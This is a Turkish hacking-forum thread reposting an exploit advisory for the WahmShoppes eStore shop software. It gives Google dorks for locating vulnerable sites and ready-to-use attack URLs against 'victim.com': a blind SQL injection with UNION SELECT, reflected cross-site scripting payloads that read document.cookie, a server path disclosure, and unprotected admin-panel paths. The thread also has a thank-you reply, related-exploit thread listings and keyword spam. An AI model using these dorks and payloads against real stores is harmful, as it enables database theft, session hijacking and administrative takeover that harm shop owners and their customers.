Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
WahmShoppes eStore Multiple Vulnerability
#1
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : multiple Vulnerability in "WahmShoppes eStore"
# Author : alieye
# vendor : http://www.wahmshoppes.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Dork: inurl:WsError.asp
# Class: Remote
# Google Dork:
# inurl:WsError.asp
# inurl:store/ We apologize but your request rendered no results
# Version: all version
# Date: 05/06/2014

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1-Blind SQL Injection

http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc

---------------------------------------------------------

2-Cross Site Scripting

Kod:
http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
---------------------------------------------------------

3-Information Disclosure in image location

Kod:
http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg
---------------------------------------------------------

4-show admin panel tools

Kod:
http://victim.com/store/frmLeft.asp
---------------------------------------------------------

Admin page

Kod:
http://victim.com/store/admin/Default.asp

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Beğenenler:
#2
Teşekkürler
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  PhpLinks Cross Site Scripting Vulnerability archavin 39 286,362 30-10-2016, Saat: 12:35
Son Yorum: JoseQual
  Wordpress HackFile Disclosure Vulnerability archavin 2 490 26-10-2016, Saat: 18:45
Son Yorum: Kolonkun
  Israelian CMS Blind SQL Injection Vulnerability H4Sec 16 1,113 01-03-2016, Saat: 03:59
Son Yorum: Zany
  Yazılım Script'i Türkiye XSS Vulnerability Stallk3r 21 914 18-01-2016, Saat: 01:28
Son Yorum: archavin
  WordPress Exploits Vulnerability İsimleri 2004 & 2015 KingSkrupellos 8 504 22-11-2015, Saat: 14:29
Son Yorum: Julian
Anahtar Kelimeler

WahmShoppes eStore Multiple Vulnerability indir, WahmShoppes eStore Multiple Vulnerability Videosu, WahmShoppes eStore Multiple Vulnerability Online izle, WahmShoppes eStore Multiple Vulnerability Bedava indir, WahmShoppes eStore Multiple Vulnerability Yükle, WahmShoppes eStore Multiple Vulnerability Hakkında, WahmShoppes eStore Multiple Vulnerability Nedir, WahmShoppes eStore Multiple Vulnerability Free indir, WahmShoppes eStore Multiple Vulnerability Oyunu, WahmShoppes eStore Multiple Vulnerability Download


1 Ziyaretçi